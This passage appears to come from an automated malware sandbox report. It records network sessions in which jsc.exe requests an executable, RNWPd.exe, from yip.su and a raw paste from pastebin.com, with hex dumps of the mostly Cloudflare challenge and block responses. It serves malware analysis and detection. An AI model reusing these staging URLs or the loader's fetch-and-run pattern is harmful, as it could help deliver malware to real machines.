4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:10:42 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:10:42 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 31 38 32 36 30 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 65 65 39 64 39 31 37 63 33 33 39 27 2c 63 48 61 73 68 3a 20 27 63 33 37 62 39 32 65 34 31 66 35 32 62 37 37 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 66 67 41 44 46 41 4b 53 6c 76 4d 43 71 52 63 2e 41 70 41 54 39 4b 53 56 4b 72 61 43 63 35 75 4a 47 64 42 65 4c 53 70 49 41 4f 6b 2d 31 37 32 33 39 33 32 36 34 32 2d 30 2e 30 2e 31 2e 31 2d 34 31 33 37 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '18260',cRay: '8b4cfee9d917c339',cHash: 'c37b92e41f52b77',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=fgADFAKSlvMCqRc.ApAT9KSVKraCc5uJGdBeLSpIAOk-1723932642-0.0.1.1-4137",cFPWv: 'g',cTTim
                                    2024-08-17 22:10:42 UTC1369INData Raw: 4a 37 64 68 44 47 72 65 79 6e 34 73 74 56 65 4d 55 42 36 37 61 37 52 69 64 65 4d 55 57 38 55 42 64 72 6b 77 71 5a 73 76 54 58 52 4d 6c 68 4e 4a 77 52 57 7a 71 6c 39 78 4e 4d 6e 43 4b 77 65 79 66 55 70 52 47 53 70 73 4b 72 65 49 5a 7a 4b 6e 4c 56 79 41 47 6e 4b 45 4f 73 7a 50 4e 6d 55 2e 65 51 39 5a 55 73 45 61 7a 5a 54 78 79 79 63 41 41 4c 7a 50 43 30 31 5f 68 51 5a 52 43 75 35 76 75 52 47 76 6e 4c 77 46 34 75 4b 58 4e 34 6c 61 6a 67 76 43 54 43 41 4c 6b 5a 73 54 6d 6a 63 58 68 43 4d 6c 48 36 38 52 70 42 44 37 4b 52 57 54 6e 62 71 4c 47 78 46 35 6c 50 4b 74 65 5f 71 4d 58 59 2e 7a 6f 74 65 78 42 57 71 6f 33 74 32 32 51 44 78 57 69 45 50 4f 37 70 68 58 39 2e 7a 35 6e 7a 6e 79 6b 69 38 54 75 5a 4a 58 31 49 4c 74 31 72 63 5f 41 66 38 74 71 41 38 54 76 67 32
                                    Data Ascii: J7dhDGreyn4stVeMUB67a7RideMUW8UBdrkwqZsvTXRMlhNJwRWzql9xNMnCKweyfUpRGSpsKreIZzKnLVyAGnKEOszPNmU.eQ9ZUsEazZTxyycAALzPC01_hQZRCu5vuRGvnLwF4uKXN4lajgvCTCALkZsTmjcXhCMlH68RpBD7KRWTnbqLGxF5lPKte_qMXY.zotexBWqo3t22QDxWiEPO7phX9.z5nznyki8TuZJX1ILt1rc_Af8tqA8Tvg2


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    56192.168.2.549783188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:10:47 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:10:47 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:10:47 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:10:47 UTC679INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 32 77 41 2b 43 77 79 4d 66 57 4b 30 52 6a 72 63 43 76 41 65 2f 57 4b 53 75 34 6c 73 4c 79 46 45 46 48 69 45 56 6c 6e 56 4b 58 2f 61 58 34 74 4a 6e 30 74 44 78 58 58 34 2b 79 4d 41 59 31 6a 7a 71 7a 76 6a 51 38 72 62 61 32 51 7a 41 2b 54 4a 4e 64 6c 39 6b 6b 32 69 31 2b 77 37 59 45 6e 6e 49 53 37 49 69 37 57 55 6a 36 45 3d 24 42 42 46 4d 72 75 56 33 4d 62 6d 58 4a 73 58 71 7a 35 6a 50 46 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: 2wA+CwyMfWK0RjrcCvAe/WKSu4lsLyFEFHiEVlnVKX/aX4tJn0tDxXX4+yMAY1jzqzvjQ8rba2QzA+TJNdl9kk2i1+w7YEnnIS7Ii7WUj6E=$BBFMruV3MbmXJsXqz5jPFw==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:10:47 UTC1369INData Raw: 33 65 31 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3e11<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:10:47 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:10:47 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:10:47 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:10:47 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:10:47 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:10:47 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:10:47 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 39 34 37 35 37 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 66 30 39 38 64 35 66 38 63 38 33 27 2c 63 48 61 73 68 3a 20 27 66 31 39 62 63 33 34 63 31 39 62 31 63 62 32 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 45 66 73 6c 34 57 44 78 50 7a 54 56 39 54 76 72 62 4d 78 68 4d 68 38 56 6f 51 39 71 7a 4a 58 76 47 64 6c 79 50 74 36 30 6f 30 30 2d 31 37 32 33 39 33 32 36 34 37 2d 30 2e 30 2e 31 2e 31 2d 34 31 35 38 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '94757',cRay: '8b4cff098d5f8c83',cHash: 'f19bc34c19b1cb2',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=Efsl4WDxPzTV9TvrbMxhMh8VoQ9qzJXvGdlyPt60o00-1723932647-0.0.1.1-4158",cFPWv: 'g',cTTim
                                    2024-08-17 22:10:47 UTC1369INData Raw: 33 54 44 69 54 61 53 46 5f 38 67 7a 71 43 41 30 73 39 78 5f 42 64 66 5a 72 2e 6d 63 77 47 46 6b 73 39 61 62 70 79 45 65 6e 55 74 44 6f 76 4d 49 69 57 35 6b 68 68 79 36 4d 65 46 5f 4f 6b 47 37 61 6b 67 72 7a 54 74 79 48 53 4e 47 70 68 53 38 75 78 51 68 6b 6a 72 54 39 74 48 77 57 55 68 36 76 51 37 42 58 73 68 39 39 72 59 54 44 6c 6d 55 49 62 55 69 7a 76 6a 4e 49 76 64 4d 37 47 34 45 50 6d 49 59 35 59 5a 63 41 58 75 75 41 5f 55 63 44 63 77 47 42 68 37 4f 44 55 44 66 51 37 49 36 49 38 6c 77 4f 72 31 6a 5a 36 72 73 2e 52 67 5f 4c 38 75 6d 33 30 44 45 49 4d 43 51 44 59 33 61 63 59 46 31 79 72 54 77 45 7a 38 47 2e 48 49 4d 57 38 78 68 75 48 4b 4e 57 41 69 30 53 72 30 50 4a 79 6a 63 54 66 65 33 5a 6e 54 37 6f 52 39 42 45 62 73 6c 6e 4f 56 33 4c 54 64 6f 75 53 72
                                    Data Ascii: 3TDiTaSF_8gzqCA0s9x_BdfZr.mcwGFks9abpyEenUtDovMIiW5khhy6MeF_OkG7akgrzTtyHSNGphS8uxQhkjrT9tHwWUh6vQ7BXsh99rYTDlmUIbUizvjNIvdM7G4EPmIY5YZcAXuuA_UcDcwGBh7ODUDfQ7I6I8lwOr1jZ6rs.Rg_L8um30DEIMCQDY3acYF1yrTwEz8G.HIMW8xhuHKNWAi0Sr0PJyjcTfe3ZnT7oR9BEbslnOV3LTdouSr


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    57192.168.2.549784104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:10:52 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:10:53 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:10:53 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cff298a2b429d-EWR
                                    2024-08-17 22:10:53 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:10:53 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:10:53 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
